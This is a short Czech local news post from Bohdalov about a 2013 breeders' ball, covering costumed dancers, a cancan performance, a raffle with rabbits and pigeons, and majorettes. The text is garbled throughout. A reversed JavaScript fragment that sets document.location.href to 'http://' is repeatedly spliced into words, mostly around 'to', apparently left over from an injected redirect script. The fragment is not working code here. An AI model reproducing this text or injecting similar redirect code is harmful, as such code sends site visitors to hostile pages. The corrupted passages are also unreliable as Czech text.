Bohdalov, aktuality, ples, chovatelé, chovatelský
Rainbow page separator

Ohlédnutí za Chovatelským plesem

Úterý, 19. března 2013

chovatelsky-ples-2013-bohdalov-2Bohdalov/ V polovině února proběhl tradiční chovatelských ples, na který chodí hosté známí i neznámí. Také nás le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos navštívili nezvyklý návštěvníci, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přestrojení v maškarních kostýmech. Byla [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to babička s dědečkem s hůlkou i s humorem. Prý se doslechli, že tu hrají a tak si jdou hodit hrbem, jak povídali u vstupu. Sotva vešli na taneční parket, začali tancovat a tak by [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mělo být. Není pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to divu, že nakonec také získali pohár pro nejlepší taneční pár.

O půl desáté nám přišli opět zatančit tanečnice ze Sboru z hor, které nás každý rok něčím novým překvapí. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos předvedli kankán od baru Colaloca. Jako vždy byly dokonalé a hezké a pomohly rozproudit zábavu.

Ples probíhal velice dobře, hosté se bavili. O půl noci proběhla [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tombola, která byla pestrá a bohatá. Návštěvníci se mohli z chovatelského plesu samozřejmě odnést i nějaké zvířátko domů, např. holuba, králíka nebo kohouta. Vyhrát ale také mohli řadu praktických produktů od místních podnikatelů.

Nečekaným překvapením na závěr plesu byla další kulturní vložka Mažoretek od vedle. Ty hostům zatancovaly na písničkou Poupata. Byly úžasní a ukázaly nám všem, že kdo se nebojí může nas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit.

Děkujeme všem, kteří se přišli bavit a podpořit tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akci. A na závěr bych chtěl říci, že nálada byla skvělá a doufám, že se za rok opět sejdeme na Chovatelském plese v Bohdalově.

Připravil: Martin Kolář